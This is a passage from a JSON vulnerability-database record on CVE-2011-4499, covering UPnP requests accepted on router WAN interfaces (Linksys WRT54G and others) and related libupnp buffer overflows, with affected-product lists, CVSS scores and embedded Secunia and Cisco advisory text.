"id": "JVNDB-2011-003030"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2013-01-31T07:26:31",
"db": "PACKETSTORM",
"id": "119949"
},
{
"date": "2013-01-30T02:46:44",
"db": "PACKETSTORM",
"id": "119896"
},
{
"date": "2011-11-22T11:55:04.793000",
"db": "NVD",
"id": "CVE-2011-4500"
},
{
"date": "2011-11-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-362"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-30T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2014-07-30T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5055"
},
{
"date": "2011-11-22T00:00:00",
"db": "VULHUB",
"id": "VHN-52445"
},
{
"date": "2015-03-19T08:33:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003030"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2011-11-22T11:55:04.793000",
"db": "NVD",
"id": "CVE-2011-4500"
},
{
"date": "2011-11-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-362"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-362"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UPnP requests accepted over router WAN interfaces",
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "configuration error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-362"
}
],
"trust": 0.6
}
}
VAR-201111-0178
Vulnerability from variot - Updated: 2023-12-18 12:09
The UPnP IGD implementation in the Broadcom UPnP stack on the Cisco Linksys WRT54G with firmware before 4.30.5, WRT54GS v1 through v3 with firmware before 4.71.1, and WRT54GS v4 with firmware before 1.06.1 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Multiple Universal Plug and Play (UPnP)-compatible routers have insufficient access restrictions: on routers that support UPnP, unintended UPnP requests are accepted on the WAN-side interface. An unauthenticated remote third party could obtain local network information or use the product as a proxy. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to internal hosts behind the NAT firewall or to proxy connections through it. Remote unauthenticated attackers can exploit these vulnerabilities to scan internal hosts or to proxy Internet traffic through the device.
The following devices are affected: Cisco Linksys WRT54G firmware version prior to 4.30.5; Cisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1; Cisco Linksys WRT54GS v4 firmware versions prior to 1.06.1; Cisco Linksys WRT54GX firmware 2.00.05; Edimax BR-6104K prior to 3.25; Edimax 6114Wg; Canyon-Tech CN-WF512 firmware version 1.83; Canyon-Tech CN-WF514 firmware version 2.08; Sitecom WL-153 prior to firmware 1.39; Sitecom WL-111; Sweex LB000021 firmware version 3.15; ZyXEL P-330W; SpeedTouch 5x6 firmware versions prior to 6.2.29; Thomson TG585 firmware versions prior to 7.4.3.2. A vulnerability exists in the UPnP IGD implementation in multiple versions of the Broadcom UPnP stack on the Cisco Linksys WRT54G. This vulnerability is related to the "external forwarding" vulnerability.
----------------------------------------------------------------------
TITLE: Siemens OZW / OZS Multiple Products libupnp Buffer Overflow Vulnerabilities
SECUNIA ADVISORY ID: SA52035
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52035/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
RELEASE DATE: 2013-01-31
DISCUSS ADVISORY: http://secunia.com/advisories/52035/#comments
DESCRIPTION: Multiple vulnerabilities have been reported in multiple Siemens OZW and OZS products, which can be exploited by malicious people to compromise a vulnerable device.
1) Multiple vulnerabilities are caused due to a bundled version of libupnp.
For more information: SA51949
2) Multiple boundary errors within the "unique_service_name()" function (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests can be exploited to cause stack-based buffer overflows. The vendor is planning to provide fixes with upcoming firmware updates.
PROVIDED AND/OR DISCOVERED BY: 2) Rapid7
ORIGINAL ADVISORY: Siemens SSA-963338: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf
Rapid7: https://community.rapid7.com/docs/DOC-2150 https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
The libupnp library is used in several vendor network devices in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at:
http://www.kb.cert.org/vuls/id/922681
Cisco is currently evaluating products for possible exposure to these vulnerabilities. This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+ ga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5 =6sTu -----END PGP SIGNATURE-----
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201111-0178",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linksys wrt54gs router",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "2.09.1"
},
{
"model": "linksys wrt54g router",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "3.03.9"
},
{
"model": "linksys wrt54g router",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "4.20.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "2.2"
},
{
"model": "wrt54gs",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.0"
},
{
"model": "wrt54gs",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "3.0"
},
{
"model": "linksys wrt54gs router",
"scope": "lte",
"trust": 1.0,
"vendor": "cisco",
"version": "1.06"
},
{
"model": "wrt54gs",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "4.0"
},
{
"model": "wrt54gs",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "2.0"
},
{
"model": "linksys wrt54gs router",
"scope": "lte",
"trust": 1.0,
"vendor": "cisco",
"version": "4.70.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "linksys wrt54g router",
"scope": "lte",
"trust": 1.0,
"vendor": "cisco",
"version": "4.20.8"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "6114wg",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "p-330w",
"scope": "eq",
"trust": 0.9,
"vendor": "zyxel",
"version": "0"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 0.9,
"vendor": "thomson",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.9,
"vendor": "speedtouch",
"version": "5x60"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wl-111",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "canyon tech",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "edimax computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys a division of cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "technicolor",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "zyxel",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "axis",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "huawei",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "siemens",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sony",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "synology",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ipitomy",
"version": null
},
{
"model": "linksys wrt54g router",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "linksys wrt54gs router",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "wrt54g",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco linksys",
"version": "firmware 4.30.5"
},
{
"model": "wrt54gs",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco linksys",
"version": "v1 from v3 firmware 4.71.1"
},
{
"model": "wrt54gs",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco linksys",
"version": "v4 firmware 1.06.1"
},
{
"model": "",
"scope": null,
"trust": 0.8,
"vendor": "multiple vendors",
"version": null
},
{
"model": "wrt54g beta/2.0",
"scope": "eq",
"trust": 0.6,
"vendor": "linksys",
"version": "4.04.20.6/4.04.0.7/3.03.3.6/3.03.1.3/2.02.4.4/2.02.02.82.00.8"
},
{
"model": "linksys wrt54gs router",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "4.70.6"
},
{
"model": "linksys wrt54g router",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "4.20.8"
},
{
"model": "linksys wrt54gs router",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.06"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "tg585 router",
"scope": "ne",
"trust": 0.3,
"vendor": "thomson",
"version": "7.4.3.2"
},
{
"model": null,
"scope": "ne",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x66.2.29"
},
{
"model": "wl-153",
"scope": "ne",
"trust": 0.3,
"vendor": "sitcom",
"version": "1.39"
},
{
"model": "wrt54g",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.01.0.6"
},
{
"model": "br-6104k",
"scope": "ne",
"trust": 0.3,
"vendor": "edimax",
"version": "3.25"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5053"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003029"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "NVD",
"id": "CVE-2011-4499"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-361"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:cisco:linksys_wrt54g_router_firmware:3.03.9:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:linksys_wrt54g_router_firmware:4.20.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:linksys_wrt54g_router_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.20.8",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:2.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:cisco:linksys_wrt54gs_router_firmware:2.09.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:linksys_wrt54gs_router_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.70.6",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54gs:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54gs:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54gs:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:cisco:linksys_wrt54gs_router_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54gs:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4499"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Garcia",
"sources": [
{
"db": "BID",
"id": "50810"
}
],
"trust": 0.3
},
"cve": "CVE-2011-4499",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CARNEGIE MELLON",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.4,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "NONE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.0,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 10.0,
"id": "VU#357851",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2011-4499",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-52444",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-4499",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#357851",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201111-361",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-52444",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "VULHUB",
"id": "VHN-52444"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003029"
},
{
"db": "NVD",
"id": "CVE-2011-4499"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-361"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UPnP IGD implementation in the Broadcom UPnP stack on the Cisco Linksys WRT54G with firmware before 4.30.5, WRT54GS v1 through v3 with firmware before 4.71.1, and WRT54GS v4 with firmware before 1.06.1 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an \"external forwarding\" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. UPnP For supported routers, WAN Unintended from the side interface UPnP There is a vulnerability that allows the request to be accepted.An unauthenticated remote third party could obtain local network information or use the product as a proxy. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to the internal host or proxy connection of the NAT firewall. Remote unauthenticated attackers can exploit vulnerabilities to scan internal hosts or communicate via the device proxy Internet. 
\nThe following devices are affected:\nCisco Linksys WRT54G firmware version prior to 4.30.5\nCisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1\nCisco Linksys WRT54GS v4 firmware versions prior to 1.06.1\nCisco Linksys WRT54GX firmware 2.00.05\nEdimax BR-6104K prior to 3.25\nEdimax 6114Wg\nCanyon-Tech CN-WF512 firmware version 1.83\nCanyon-Tech CN-WF514 firmware version 2.08\nSitecom WL-153 prior to firmware 1.39\nSitecom WL-111\nSweex LB000021 firmware version 3.15\nZyXEL P-330W\nSpeedTouch 5x6 firmware versions prior to 6.2.29\nThomson TG585 firmware versions prior to 7.4.3.2. A vulnerability exists in the UPnP IGD installation and enablement of multiple versions of the Broadcom UPnP stack on the Cisco Linksys WRT54G. This vulnerability is related to the \"external forwarding\" vulnerability. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSiemens OZW / OZS Multiple Products libupnp Buffer Overflow\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA52035\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/52035/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nRELEASE DATE:\n2013-01-31\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/52035/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/52035/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * 
CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in multiple Siemens OZW\nand OZS products, which can be exploited by malicious people to\ncompromise a vulnerable device. \n\n1) Multiple vulnerabilities are caused due to a bundled version of\nlibupnp. \n\nFor more information:\nSA51949\n\n2) Multiple boundary errors within the \"unique_service_name()\"\nfunction (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests\ncan be exploited to cause stack-based buffer overflows. The vendor is planning\nto provide fixes with upcoming firmware updates. \n\nPROVIDED AND/OR DISCOVERED BY:\n2) Rapid7\n\nORIGINAL ADVISORY:\nSiemens SSA-963338:\nhttp://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf\n\nRapid7:\nhttps://community.rapid7.com/docs/DOC-2150\nhttps://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against 
the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. This library is used in several vendor network\ndevices in addition to media streaming and file sharing applications. \nThese vulnerabilities were disclosed on January 29th, 2013 in a CERT\nVulnerability Note, VU#922681, which can be viewed at:\n\nhttp://www.kb.cert.org/vuls/id/922681\n\nCisco is currently evaluating products for possible exposure to these\nvulnerabilities. This advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+\nga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5\n=6sTu\n-----END PGP SIGNATURE-----\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4499"
},
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003029"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "CNVD",
"id": "CNVD-2011-5053"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "VULHUB",
"id": "VHN-52444"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
}
],
"trust": 4.86
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851",
"trust": 5.8
},
{
"db": "NVD",
"id": "CVE-2011-4499",
"trust": 3.4
},
{
"db": "SIEMENS",
"id": "SSA-963338",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#922681",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003029",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-5053",
